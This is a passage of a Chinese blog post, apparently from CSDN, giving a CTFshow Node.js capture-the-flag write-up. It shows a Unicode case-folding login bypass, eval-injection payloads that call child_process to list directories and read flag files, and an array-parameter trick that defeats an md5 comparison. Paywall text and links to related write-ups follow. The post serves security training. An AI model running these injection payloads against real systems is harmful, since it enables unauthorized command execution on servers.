CTFSHOW nodejs篇

原创 已于 2022-07-04 14:57:47 修改 · 7.7k 阅读 · 14 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#javascript #前端 #安全

于 2021-02-18 22:01:31 首次发布
本文详细探讨了JavaScript中的字符转换、命令注入、原型链污染等安全问题,通过实例展示了如何利用这些漏洞执行系统命令、实现反射编程及进行权限提升。同时,提到了EJS和Pug模板引擎的利用方式,以及如何通过精心构造的payload来绕过过滤限制,达到攻击目的。

文章目录

web334

在Character.toUpperCase()函数中,字符ı会转变为I,字符ſ会变为S。
在Character.toLowerCase()函数中,字符İ会转变为i,字符K会转变为k。
所以用ctfſhow 123456登录就可以出flag了

web335

猜测题目中的代码为eval('xxx')xxx为我们传入的内容,eval中可以执行js代码,那么就可以执行系统命令了。
require('child_process').execSync('ls /').toString()

require( 'child_process' ).spawnSync( 'ls', [ '/' ] ).stdout.toString()
require( 'child_process' ).spawnSync( 'cat', [ 'f*' ] ).stdout.toString()

web336

require( 'child_process' ).spawnSync( 'ls', [ '/' ] ).stdout.toString()
require( 'child_process' ).spawnSync( 'cat', [ 'f*' ] ).stdout.toString()

web337

payload:a[x]=1&b[x]=2
运行如下代码

a={
   
   'x':'1'}
b={
   
   'x':'2'}

console.log(a+"flag{xxx}")
console.log(b+"flag{xxx}")

两个都会打印出[object Object]flag{xxx},所以他们的md5也是一样的了。
有同学可能会问为什么传a[0]=1&b[0]=2不行呢,因为当我们这样传的时候相当于创了个变量a=[1] b=[2]

a=[1]
b=[2]
a=[1]
b=[2]

console.log
最低0.47元/天 解锁文章
ctfshow node.js专题
akxnxbshai的博客
12-02 702
学习一下node,js。
ctf刷题 ctfshow【网鼎杯】
weixin_44807430的博客
01-07 3631
纯粹学安全
CTFshow-WEB入门-PHP特性(持续更新)
feng的博客
01-20 6586
web89 利用intval的这个特性: 非空的数组会返回1,因此利用数组绕过。 web90 两种方式: ?num=4476a ?num=0x117c web91 考察了preg_match的/m模式。 默认的正则开始"^“和结束”$“只是对于正则字符串如果在修饰符中加上"m”,那么开始和结束将会指字符串的每一行:每一行的开头就是"^",结尾就是"$"。 因此?cmd=php%0a1即可 web92 <?php include("flag.php"); highlight_file(__
CTFSHOW-nodejs
Yb_140的博客
05-13 1036
web334 下载附件,添加后缀 .zip,之后打开,发现有两个文件login.js和user.js 发现用户名和密码 用户名不能为CTFSHOW 其中toUpperCase()函数为转为大写 所以输入的用户名为ctfshow,密码为123456 得到flag web335 查看页面源代码,发现 可能为GET传参,命令执行 在nodejs中,eval()方法用于计算字符串,并把它作为脚本代码来执行,语法为“eval(string)”;如果参数不是字符串,而是整数或者是F.
CTF-Show nodejs
2301_80125214的博客
04-27 881
下载附件,有两个文件在Character.toUpperCase()函数中,字符ı会转变为I,字符ſ会变为S。在Character.toLowerCase()函数中,字符İ会转变为i,字符K会转变为k。所以用ctfſhow 123456登录就可以出flag了。
CTFshow nodejs
starttv的博客
11-19 752
​Node.js 是一个基于 Chrome V8 引擎的 Javascript 运行环境。可以说nodejs是一个运行环境,或者说是一个 JS 语言解释器而不是某种库。 Nodejs 是基于 Chrome 的 V8 引擎开发的一个 C++ 程序,目的是提供一个 JS 的运行环境。最早 Nodejs 主要是安装在服务器上,辅助大家用 JS 开发高性能服务器代码,但是后来 Nodejs前端也大放异彩,带来了 Web 前端开发的革命。
ctfshow nodejs
fmyyy1的博客
07-16 1454
334 源码给了 登录成功就能拿到flag var express = require('express'); var router = express.Router(); var users = require('../modules/user').items; var findUser = function(name, password){ return users.find(function(item){ return name!=='CTFSHOW' && item
ctfshow nodejs wp
yink12138的博客
01-12 507
ctfshow nodejs部分的wp
ctfshow nodejs
08-10
你想了解关于 CTFShow Node.js 的信息吗?CTFShow 是一个 CTF(Capture The Flag)比赛平台,而 Node.js 是一种流行的 JavaScript 运行环境。你可能希望了解如何在 CTFShow 中使用 Node.js,或者有关 Node.js 的一些...
ctfshow web入门 nodejs web338--web344
最新发布
2301_81040377的博客
07-06 1071
Function环境下没有require函数,不能获得child_process模块,我们可以通过使用process.mainModule.constructor._load来代替require。然后我们利用这个来使用copy来实现属性的污染把,secret的ctfshow属性变为36dboy。和后面的 var __tmp2 不能删,是为了闭合代码。由于是污染题,所以我靶机是开了差不多十来次,终于是拿到了。源码和340没有变,但是没有api的函数触发了。污染之后没有反应,随便访问一个页面,反弹成功。
AST-injection-ctf:在Nodejs应用中演示AST注入
04-23
AST注射CTF 在Nodejs应用中演示AST注入。 需要Docker和docker-compose! 生成Node.js应用程序映像 docker build -t demo-ctf . 构建映像时忽略所有红线:))) 泊坞窗组成 docker-compose up -d 运行应用 转到本地主机:3000 重新加载,直到一切正常 尝试RCE ^^ 主意 浏览网站的功能,我们可以得出以下结果: 该站点用于统计功能,图形功能 勒索,勒索软件和受害者有3种主要模型 访问每个模型的路径以检查功能,请参阅两个模型勒索软件和受害者都有查看详细信息的功能。 检查两个模型的详细信息,查看受害者只能下载信息,勒索软件可以上传新配置以执行更新,可以上传文件以利用安全漏洞 在正确的功能中观察网站的源代码,以上传勒索软件配置文件: 使用模板引擎的网页是刀片 更新功能已重新注释以进行维护 var c
CTFshow——Node.js
D.MIND 的博客
05-19 1066
require() 用于引入模块、 JSON、或本地文件 // 引入本地模块: const myLocalModule = require('./path/myLocalModule'); // 引入 JSON 文件: const jsonData = require('./path/filename.json'); // 引入 node_modules 模块或 Node.js 内置模块: const crypto = require('crypto'); 334 user.js中有登录的账号密码,但
ctfshow Nodejs
weixin_63231007的博客
03-08 993
承接上文nodejs原型链漏洞刷题练习
ctfshow_nodejs
qq_45951598的博客
03-13 516
这里写目录标题web334web335方法一方法二web336 web334 打开题目下载源码 打开longin.js var express = require('express'); var router = express.Router(); var users = require('../modules/user').items; var findUser = function(name, password){ return users.find(function(item){ r
CTFSHOW】web入门 NodeJS
7ruth0hn的博客
10-04 995
文章目录写在前面web334web335web336web337web338web339参考资料 写在前面 web334 下载附件,其中user.js得到用户名为: CTFSHOW 密码为: 123456 审计login.js代码,其中: return name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === password; 得到name不能为“CTFSHOW”,但只要
ctfshow-nodejs
qq_63928796的博客
12-29 319
这里就是原型链污染,参考:https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html#0x02-javascript。只要满足secert.ctfshow==='36dboy’就可以了,前面有一个copy函数,可以与链接文章里面的merge函数类比.附件给了user.js和login.js,user.js告诉了用户名和密码。和上一题一样,但上一题的payload不能用了。a 和 b 的长度相等。
Ctfshow nodejs
Elite的博客
09-02 1232
Node.js是一个基于Chrome V8引擎的JavaScript运行时环境。它允许使用JavaScript来编写服务器端代码,使得JavaScript既可以在浏览器中运行,也可以在服务器端进行开发
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值